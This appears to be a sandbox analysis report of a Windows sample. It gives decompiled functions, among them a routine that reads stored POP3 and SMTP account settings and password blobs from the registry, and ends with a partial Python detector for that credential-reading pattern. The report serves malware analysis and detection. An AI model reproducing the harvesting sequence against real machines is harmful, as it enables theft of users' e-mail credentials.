		 *0x418540 = 0x8000; // total buffer size, also serves as the "already initialised" flag
		 *0x418544 = 0x100;  // element count for the two dword arrays
		 *0x418548 = 0x1000; // executed
		L00412090(); // executed
		 *0x418528 = 0x8000;
		_t27 = 4;
		_t16 =  *0x418544 * _t27;
		_push( ~(0 | _t33 > 0x00000000) | _t16);
		L00412090();
		 *0x418530 = _t16;
		_t29 = 4;
		_t18 =  *0x418544 * _t29;
		_push( ~(0 | _t33 > 0x00000000) | _t18);
		L00412090();
		_push( *0x418548);
		 *0x418534 = _t18; // executed
		L00412090(); // executed
		 *0x41852c = _t18;
		return _t18;
	}
	return _t13;
}

Instruction addresses: 0x004079e7, 0x004079ee, 0x004079f5, 0x004079f6, 0x004079fb, 0x00407a05, 0x00407a0f, 0x00407a14, 0x00407a22, 0x00407a23, 0x00407a2c, 0x00407a2d, 0x00407a32, 0x00407a40, 0x00407a41, 0x00407a4a, 0x00407a4b, 0x00407a50, 0x00407a56, 0x00407a5b, 0x00407a63, 0x00000000, 0x00407a63, 0x00407a68

APIs
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: 1f5e21fb5e0b6fdb4249ba77804457959e5d31aa328e92d400b1c26414509871
• Instruction ID: c43431202d49818a45d5cc7318ffcbdb911bff3577ce92db202b1535657ef0fb
• Opcode Fuzzy Hash: 1f5e21fb5e0b6fdb4249ba77804457959e5d31aa328e92d400b1c26414509871
• Instruction Fuzzy Hash: C2F0FFB1542210AEDB94DB34EE467953AE6E708354F10813EE60ACA2B1FFB85440CB0C
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00406104(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
	void* _t8;
	void* _t13;
	signed int _t16;
	void** _t21;
	signed int _t22;

	_t21 = __edi;
	_t22 =  *__eax;
	if(__edx < _t22) {
		return 0;
	} else {
		_t13 =  *__edi;
		do {
			 *__eax =  *__eax + _a8;
			_t16 =  *__eax;
		} while (__edx >= _t16);
		_t8 = malloc(_t16 * _a4); // executed
		 *__edi = _t8;
		if(_t22 > 0) {
			if(_t8 != 0) {
				memcpy(_t8, _t13, _t22 * _a4);
			}
			free(_t13);
		}
		return 0 |  *_t21 != 0x00000000;
	}
}

Instruction addresses: 0x00406104, 0x00406105, 0x00406109, 0x00406154, 0x0040610b, 0x0040610c, 0x0040610e, 0x00406112, 0x00406114, 0x00406116, 0x00406120, 0x00406128, 0x0040612a, 0x0040612e, 0x00406138, 0x0040613d, 0x00406141, 0x00406146, 0x00406150, 0x00406150

APIs
• malloc.MSVCRT ref: 00406120
• memcpy.MSVCRT ref: 00406138
• free.MSVCRT(00000000,00000000,76D24DE0,00406B78,00000001,?,00000000,76D24DE0,00406EF2,00000000,?,?), ref: 00406141
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
• Opcode ID: 2c99a99ae30e83ce40482d8e5bccf8072ec36ae410a4a270b365b928ce6b5d38
• Instruction ID: 359978e28c917f6ac826eaac10a3cae38cc8b637956f46d5a6e637dfc07492fc
• Opcode Fuzzy Hash: 2c99a99ae30e83ce40482d8e5bccf8072ec36ae410a4a270b365b928ce6b5d38
• Instruction Fuzzy Hash: DFF089726052229FC708AF76A98145BB79DAF48354712487FF505E7282DB38DCA0C7A4
Uniqueness Score: -1.00%

C-Code - Quality: 93%
E0040BAB7(void* __edi, void* __eflags) {
	void* __esi;
	signed int _t24;
	intOrPtr _t31;
	intOrPtr _t38;
	void* _t42;
	void* _t45;
	void* _t49;
	void* _t51;
	intOrPtr _t52;

	_t54 = __eflags;
	_t49 = __edi;
	_t38 = 0;
	E00402393( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
	 *((intOrPtr*)(__edi + 0x108)) = 0;
	E00401E4A(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
	_t24 =  *((intOrPtr*)(__edi + 0x37c));
	if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
		_t51 = 0x41344f;
	} else {
		if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
			_t45 = 0;
			__eflags = 0;
		} else {
			_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
		}
		_t51 = _t45;
	}
	_push(_t51);
	_push("/stext");
	L00412072();
	if(_t24 != 0) {
		_t52 = E0040BA21(_t24, _t51);
		__eflags = _t52 - _t38;
		if(_t52 <= _t38) {
			goto L15;
		}
		goto L9;
	} else {
		_t52 = 1;
		L9:
		E0040B031(_t49, _t38); // executed
		E0040A6C6(_t49);
		_t31 =  *((intOrPtr*)(_t49 + 0x37c));
		if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
			_t42 = 0x41344f;
		} else {
			_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
			if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
				_t42 = 0;
			} else {
				_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
			}
		}
		 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
		E00409C9C( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
		_t38 = 1;
		E0040B1DC(_t49);
		L15:
		return _t38;
	}
}












                                                                                                                                                                  0x0040bab7
                                                                                                                                                                  0x0040bab7
                                                                                                                                                                  0x0040bac0
                                                                                                                                                                  0x0040bac4
                                                                                                                                                                  0x0040bad5
                                                                                                                                                                  0x0040badb
                                                                                                                                                                  0x0040bae0
                                                                                                                                                                  0x0040bae9
                                                                                                                                                                  0x0040bb00
                                                                                                                                                                  0x0040baeb
                                                                                                                                                                  0x0040baee
                                                                                                                                                                  0x0040bafa
                                                                                                                                                                  0x0040bafa
                                                                                                                                                                  0x0040baf0
                                                                                                                                                                  0x0040baf5
                                                                                                                                                                  0x0040baf5
                                                                                                                                                                  0x0040bafc
                                                                                                                                                                  0x0040bafc
                                                                                                                                                                  0x0040bb05
                                                                                                                                                                  0x0040bb06
                                                                                                                                                                  0x0040bb0b
                                                                                                                                                                  0x0040bb14
                                                                                                                                                                  0x0040bb20
                                                                                                                                                                  0x0040bb22
                                                                                                                                                                  0x0040bb24
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040bb16
                                                                                                                                                                  0x0040bb18
                                                                                                                                                                  0x0040bb26
                                                                                                                                                                  0x0040bb29
                                                                                                                                                                  0x0040bb30
                                                                                                                                                                  0x0040bb35
                                                                                                                                                                  0x0040bb3f
                                                                                                                                                                  0x0040bb56
                                                                                                                                                                  0x0040bb41
                                                                                                                                                                  0x0040bb41
                                                                                                                                                                  0x0040bb45
                                                                                                                                                                  0x0040bb52
                                                                                                                                                                  0x0040bb47
                                                                                                                                                                  0x0040bb4d
                                                                                                                                                                  0x0040bb4d
                                                                                                                                                                  0x0040bb45
                                                                                                                                                                  0x0040bb6b
                                                                                                                                                                  0x0040bb78
                                                                                                                                                                  0x0040bb81
                                                                                                                                                                  0x0040bb82
                                                                                                                                                                  0x0040bb88
                                                                                                                                                                  0x0040bb8c
                                                                                                                                                                  0x0040bb8c

APIs
  • Part of subcall function 00401E4A: memset.MSVCRT ref: 00401E6C
  • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401E85
  • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401E93
  • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401ED9
  • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401EE7
• _stricmp.MSVCRT(/stext,0041344F,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BB0B
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: strlen$_stricmpmemset
• String ID: /stext
• API String ID: 3575250601-3817206916
• Opcode ID: ef7f166fbeea55439cfe23be9aafe6a7a28943b2fccc9fc2cab937996929cfca
• Instruction ID: f8692cde8425b7317fc14f1eb66aa5838d4e8645dd66f9f31b24f8adae3a6e9d
• Opcode Fuzzy Hash: ef7f166fbeea55439cfe23be9aafe6a7a28943b2fccc9fc2cab937996929cfca
• Instruction Fuzzy Hash: 20213E707141119FC368AF29C8D1A66B3A8FB04318B15827FE41AA7692C779EC518BCD
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040625C() {
	struct tagLOGFONTA _v64;
	struct HFONT__* _t6;

	// Fill the LOGFONTA structure for face "Arial", height 0xe (subcall does memset + strcpy)
	E0040619B( &_v64, "Arial", 0xe, 0);
	// Create the GDI font from the populated structure and return its handle
	_t6 = CreateFontIndirectA( &_v64); // executed
	return _t6;
}

Instruction addresses: 0x0040626e 0x0040627a 0x00406281

APIs
  • Part of subcall function 0040619B: memset.MSVCRT ref: 004061A5
  • Part of subcall function 0040619B: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406273,Arial,0000000E,00000000), ref: 004061E5
• CreateFontIndirectA.GDI32(?), ref: 0040627A
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: CreateFontIndirectmemsetstrcpy
• String ID: Arial
• API String ID: 3275230829-493054409
• Opcode ID: 4817efd26ad33d4b637fc7e29178505d6c073bef41158034ee275bb9fa043b80
• Instruction ID: 6f23277ce9f10cc220d5cb12b38cfb89722835dabc034d80cc056b5664af2580
• Opcode Fuzzy Hash: 4817efd26ad33d4b637fc7e29178505d6c073bef41158034ee275bb9fa043b80
• Instruction Fuzzy Hash: 8FD01270D4020D77E610FBA0FC07FC97BAC5B00B05F504431B901F50E6FAE8E2598699
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004047AA(CHAR* __esi, void* __eflags) {
	struct HINSTANCE__* _t8;
	char _t12;
	char* _t15;
	CHAR* _t17;

	_t17 = __esi;
	// Release any module previously held by this descriptor (subcall calls FreeLibrary)
	E004047FB(__esi);
	// The descriptor starts with the module name; load it and store the handle at +0x200
	_t8 = LoadLibraryA(__esi); // executed
	__esi[0x200] = _t8;
	if(_t8 != 0) {
		// Resolve the export named at +0xff and store its address at +0x208
		_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
		__esi[0x208] = _t12;
		if(_t12 != 0) {
			// Success flag at +0x204: both the module and the export were found
			__esi[0x204] = 1;
		}
	}
	_t15 =  &(_t17[0x204]);
	if( *_t15 == 0) {
		// Resolution failed: free the module again so no dangling handle is kept
		E004047FB(_t17);
	}
	return  *_t15;
}

Instruction addresses: 0x004047aa 0x004047ac 0x004047b2 0x004047ba 0x004047c0 0x004047ca 0x004047d2 0x004047d8 0x004047da 0x004047da 0x004047d8 0x004047e5 0x004047ee 0x004047f2 0x004047f2 0x004047fa

APIs
  • Part of subcall function 004047FB: FreeLibrary.KERNELBASE(?,?), ref: 00404810
• LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,7479F420), ref: 004047B2
• GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID:
• API String ID: 145871493-0
• Opcode ID: 79a2d912799eded2ecd004947e833272afd2c53e23871a46eb3e118a9608fd27
• Instruction ID: a05247dfa83e1e5897bdf1ebfda0bf15c3173a66790072ff667e3a7d903ceddc
• Opcode Fuzzy Hash: 79a2d912799eded2ecd004947e833272afd2c53e23871a46eb3e118a9608fd27
• Instruction Fuzzy Hash: C6F0E5B46007038BD720DF39D849797B7E8AF45701F00853EF166E3185E778A641C758
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetPrivateProfileIntA.KERNEL32 ref: 0040F1A6
  • Part of subcall function 0040F097: memset.MSVCRT ref: 0040F0B5
  • Part of subcall function 0040F097: _itoa.MSVCRT ref: 0040F0CC
  • Part of subcall function 0040F097: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040F0DB
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4165544737-0
                                                                                                                                                                  • Opcode ID: 60443182dfafd2705f0bd8163bf991a75ed65358abc62ac36d7f3c586c4344a1
                                                                                                                                                                  • Instruction ID: ef80bc42b69c7626de0f5e8b39bb4bd6d74a87ec05759e80c101291bc1ad5009
                                                                                                                                                                  • Opcode Fuzzy Hash: 60443182dfafd2705f0bd8163bf991a75ed65358abc62ac36d7f3c586c4344a1
                                                                                                                                                                  • Instruction Fuzzy Hash: 22E0B632004209FBCF125F90EC01AA93FA6FF04315F148479F95C14961E33295B4AB84
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
E004047FB(void* __eax) {
    struct HINSTANCE__* _t5;
    signed int* _t7;

    *(__eax + 0x204) = *(__eax + 0x204) & 0x00000000;
    _t7 = __eax + 0x200;
    _t5 = *_t7;
    if(_t5 != 0) {
        _t5 = FreeLibrary(_t5); // executed
        *_t7 = *_t7 & 0x00000000;
    }
    return _t5;
}

APIs
• FreeLibrary.KERNELBASE(?,?), ref: 00404810
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 9daaca44af3c137c04138a24eb8ff8cf64b72ee1785e34895ec44d417b16343b
• Instruction ID: a9857fde68bfdf8991c7705c8330266d98638ef7b5ff2aef664b3e01c595234a
• Opcode Fuzzy Hash: 9daaca44af3c137c04138a24eb8ff8cf64b72ee1785e34895ec44d417b16343b
• Instruction Fuzzy Hash: 54D012B61003118FDB209F14EC0CBE133ECAF40312F15C4B9E951A7156C3349540CA58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00405EEE(CHAR* _a4) {
    void* _t3;

    _t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
    return _t3;
}

APIs
• CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409CBE,00000000,00000000,00000000,0041344F,0041344F,?,0040BB7D,0041344F), ref: 00405F00
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 9dd7920263122c6c5394d1aa857aadcc673b4f54c51fbdd86ca26a9f0088c7b1
• Instruction ID: bc29cfa666e89d0cfbdb77cae37961506820f0e8ddae25b665a114bfacacae09
• Opcode Fuzzy Hash: 9dd7920263122c6c5394d1aa857aadcc673b4f54c51fbdd86ca26a9f0088c7b1
• Instruction Fuzzy Hash: 1BC092B0660200BEFE208A20AC0AF77299DD780705F1084207A04E40E0C2A18C008624
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040F402(struct HINSTANCE__* _a4, CHAR* _a8) {

    EnumResourceNamesA(_a4, _a8, E0040F37C, 0); // executed
    return 1;
}

APIs
• EnumResourceNamesA.KERNEL32 ref: 0040F411
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: EnumNamesResource
• String ID:
• API String ID: 3334572018-0
• Opcode ID: 37d1da76d95b5e126e15f716cf118d031e4b8f34fe6c8a3d6132a8d2fb8fd21e
• Instruction ID: fad5876d7f8aa1560905c766ba53a11d3010bfcf0403834e812c2ac38a9eeaed
• Opcode Fuzzy Hash: 37d1da76d95b5e126e15f716cf118d031e4b8f34fe6c8a3d6132a8d2fb8fd21e
• Instruction Fuzzy Hash: 88C09B31594341D7C711DF208C05F1BFEE5BB5C702F108C3D7151D40E4C77180189615
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004070C5(signed int* __esi) {
    int _t2;
    void* _t3;

    _t3 = *__esi;
    if(_t3 != 0xffffffff) {
        _t2 = FindClose(_t3); // executed
        *__esi = *__esi | 0xffffffff;
        return _t2;
    }
    return 0;
}

APIs
• FindClose.KERNELBASE(?,00406FDF,?,?,00000000,?,00411327,*.oeaccount,0041141B,?,00000104), ref: 004070CF
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: 1626034a8a252c87a5f1d6eb16cf0afdbdd25481107d0dfa13c5d9d9acae7190
• Instruction ID: fb6f9d5761a39194e530e87d941626cbb459cc8d01e30c2ad93bf7984ca40ca8
• Opcode Fuzzy Hash: 1626034a8a252c87a5f1d6eb16cf0afdbdd25481107d0dfa13c5d9d9acae7190
• Instruction Fuzzy Hash: 77C09230510A01ABD23C5F389C5A46A7BA0AF593323B48F6CE0F3D24F0E73899868A04
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040EF05(void* __esi) {
    struct HINSTANCE__* _t6;
    int _t7;

    _t6 = *(__esi + 8);
    *(__esi + 0xc) = *(__esi + 0xc) & 0x00000000;
    if(_t6 != 0) {
        _t7 = FreeLibrary(_t6); // executed
        *(__esi + 8) = *(__esi + 8) & 0x00000000;
        return _t7;
    }
    return _t6;
}

                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,0040EF39,?,?,?,?,?,?,00404221), ref: 0040EF11
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                  • Opcode ID: 2e074f5d4832a7d58a2bd7b26742b92faf01e6cbf369b165caea939fd76fa933
                                                                                                                                                                  • Instruction ID: 3414d520a0ca87f174e03c7aae78275fe345844bef97b548c291c08909f1245b
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e074f5d4832a7d58a2bd7b26742b92faf01e6cbf369b165caea939fd76fa933
                                                                                                                                                                  • Instruction Fuzzy Hash: 62C04C31210702DBEB218B12C849753B7E8AB40317F40CC68945695494D77DE454CE18
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
			E00406155(CHAR* _a4) {
				long _t4;

				// Existence check: GetFileAttributesA returns INVALID_FILE_ATTRIBUTES (0xffffffff) on failure.
				_t4 = GetFileAttributesA(_a4); // executed
				return 0 | _t4 != 0xffffffff; // 1 if the path exists, 0 otherwise
			}





                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                  • Opcode ID: 926f1fff4bfe7087d2453ca09093eb98846d62159ddff5e69568d7a31b1a8361
                                                                                                                                                                  • Instruction ID: f305466360af1034a225c08a34d2ddc6697937c487c9f6746c0aa1a011dcbbf5
                                                                                                                                                                  • Opcode Fuzzy Hash: 926f1fff4bfe7087d2453ca09093eb98846d62159ddff5e69568d7a31b1a8361
                                                                                                                                                                  • Instruction Fuzzy Hash: CCB012753100005BCB080B349C4A0CD35506F446327204B3CB033C00F0D720CE60BA00
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
			E0040F1B0(void* _a4, char* _a8, void** _a12) {
				long _t4;

				// 0x20019 == KEY_READ (READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY):
				// opens subkey _a8 under root _a4 read-only and returns the handle through _a12.
				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
				return _t4; // ERROR_SUCCESS (0) or a Win32 error code
			}





                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                  • Opcode ID: 0defe296c07798555785544969a09239eaeede922113c6288443005d002a046f
                                                                                                                                                                  • Instruction ID: 6c28280414aaf847a098fae787e0885161fd0282473b9be1e1f1fd42ed515737
                                                                                                                                                                  • Opcode Fuzzy Hash: 0defe296c07798555785544969a09239eaeede922113c6288443005d002a046f
                                                                                                                                                                  • Instruction Fuzzy Hash: 41C09B35544301FFDE118F40ED05F09BFA1AB88B05F008414B244240B1C2718414EB17
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  C-Code - Quality: 87%
			E00402D74(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
				/* Reads one e-mail account definition from the registry. _a4 is the root key and
				   _a8 the subkey name on entry (the opened handle afterwards). The POP3 settings
				   and password blob are collected in the record at _v940, the SMTP settings and
				   password blob in the record at _v1872; each record is handed to E004023C6 when
				   its account name is non-empty. */
				signed int _v8;
				char _v20;
				char _v24;
				char _v152;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				char _v952;
				char _v956;
				char _v1084;
				char _v1212;
				char _v1340;
				intOrPtr _v1344;
				char _v1600;
				char _v1728;
				intOrPtr _v1732;
				char _v1860;
				char _v1872;
				void* _t59;
				signed int _t60;
				intOrPtr _t63;
				void* _t113;
				signed int _t116; // POP password length (declaration missing from the decompiler output)
				signed int _t117; // SMTP password length (declaration missing from the decompiler output)
				void* _t118;
				void* _t122;
				char* _t123;
				void* _t141;

				_t141 = __fp0;
				_t118 = __edi;
				_t113 = __ecx;
				_t59 = E0040F1B0(_a4, _a8,  &_a8); // RegOpenKeyExA(root, subkey, KEY_READ, &handle)
				if(_t59 == 0) { // ERROR_SUCCESS
					_t60 = 0x7d;
					_a4 = _t60; // capacity of the PopPassword buffer (_v280), updated to the length read
					_v8 = _t60; // capacity of the SMTPPassword buffer (_v1212), updated to the length read
					E00402197( &_v1872); // initialise both account records
					E00402197( &_v940);
					_t63 = 2;
					_v1732 = _t63;
					_v800 = _t63;
					_push( &_v928);
					_push("DisplayName");
					_push(_a8);
					_v1344 = 4;
					_t122 = 0x7f;
					_v412 = 1;
					E0040F1F1(_t122, _t113); // string value read; the three pushed arguments (handle, "DisplayName", &_v928) belong to this call
					E0040F1F1(_t122, _t113, _a8, "EmailAddress",  &_v796); // E0040F1F1: string value read, 0x7f appears to be the buffer limit
					E0040F1F1(_t122, _t113, _a8, "PopAccount",  &_v408);
					E0040F1F1(_t122, _t113, _a8, "PopServer",  &_v668);
					E0040F1CA(_t113, _a8, "PopPort",  &_v24); // E0040F1CA: DWORD value read
					E0040F1CA(_t113, _a8, "PopLogSecure",  &_v20);
					if(E0040F214(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) { // E0040F214: binary value read, size in/out
						_a4 = _a4 & 0x00000000; // value missing or too large: treat as no password
					}
					strcpy( &_v1860,  &_v928); // DisplayName into the SMTP record
					strcpy( &_v1728,  &_v796); // EmailAddress into the SMTP record
					E0040F1F1(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
					E0040F1F1(_t122, _t113, _a8, "SMTPServer",  &_v1600);
					E0040F1CA(_t113, _a8, "SMTPPort",  &_v956);
					E0040F1CA(_t113, _a8, "SMTPLogSecure",  &_v952);
					if(E0040F214(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
						_v8 = _v8 & 0x00000000;
					}
					_t123 = _t118 + 0xa9c; // string owned by the caller's object (edi), copied into both records
					strcpy( &_v152, _t123);
					strcpy( &_v1084, _t123);
					_t116 = _a4;
					if(_a4 > 0) {
						E00401CD7( &_v280, _t116); // post-process (presumably decode) the POP password blob
					}
					if(_v408 != 0) { // PopAccount non-empty: report the POP3 record
						E004023C6( &_v940, _t141, _t118);
					}
					_t117 = _v8;
					if(_v8 > 0) {
						E00401CD7( &_v1212, _t117); // same for the SMTP password blob
					}
					if(_v1340 != 0) { // SMTPAccount non-empty: report the SMTP record
						E004023C6( &_v1872, _t141, _t118);
					}
					return RegCloseKey(_a8);
				}
				return _t59; // RegOpenKeyExA error code
			}
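The function above is the report's record of the harvesting sequence: open the account key with KEY_READ, then query the identity values (DisplayName, EmailAddress, PopAccount, SMTPAccount, ...) and the two password blobs (PopPassword, SMTPPassword) under the same handle. The Python below is an added example, not code from the sample or from the sandbox report: it replays that sequence over a constructed registry-API event trace and flags any process that reads both an identity value and a password value from one key. The event layout (pid, api, key, value, access), the key path HKCU\Software\ExampleMailClient\Accounts\00000001 and the PIDs are assumptions made for the example; the samDesired bit names are the winnt.h/winreg.h constants, and 0x20019 is the KEY_READ mask seen in E0040F1B0.

```python
"""Hunt for the registry access pattern of E00402D74.

Added example for this report; not code from the sample or the sandbox.
The event records are constructed here and their layout (pid, api, key,
value, access) is an assumption, not a real sensor format.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass

# samDesired bits from winnt.h / winreg.h; KEY_READ == 0x20019.
KEY_ACCESS_BITS = {
    0x00000001: "KEY_QUERY_VALUE",
    0x00000002: "KEY_SET_VALUE",
    0x00000004: "KEY_CREATE_SUB_KEY",
    0x00000008: "KEY_ENUMERATE_SUB_KEYS",
    0x00000010: "KEY_NOTIFY",
    0x00000020: "KEY_CREATE_LINK",
    0x00000100: "KEY_WOW64_64KEY",
    0x00000200: "KEY_WOW64_32KEY",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
}


def decode_key_access(sam: int) -> list[str]:
    """Expand a samDesired mask into named rights; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(KEY_ACCESS_BITS.items()) if sam & bit]
    rest = sam & ~sum(KEY_ACCESS_BITS)
    if rest:
        names.append(hex(rest))
    return names


# Value names E00402D74 reads for one account: identity/settings vs. secrets.
IDENTITY_VALUES = {"DisplayName", "EmailAddress", "PopAccount", "PopServer",
                   "SMTPAccount", "SMTPServer"}
SECRET_VALUES = {"PopPassword", "SMTPPassword"}


@dataclass(frozen=True)
class RegEvent:
    pid: int
    api: str            # "RegOpenKeyExA" or "RegQueryValueExA"
    key: str            # key path as the sensor reports it
    value: str = ""     # value name, for RegQueryValueExA
    access: int = 0     # samDesired, for RegOpenKeyExA


def find_credential_harvesters(events: list[RegEvent]) -> dict[tuple[int, str], dict]:
    """Return {(pid, key): {"access": [...], "values": [...]}} for every key where
    one process queried at least one identity value AND one password value."""
    opens: dict[tuple[int, str], int] = {}
    queried: dict[tuple[int, str], set[str]] = defaultdict(set)
    for ev in events:
        k = (ev.pid, ev.key)
        if ev.api == "RegOpenKeyExA":
            opens[k] = ev.access
        elif ev.api == "RegQueryValueExA":
            queried[k].add(ev.value)
    hits = {}
    for k, vals in queried.items():
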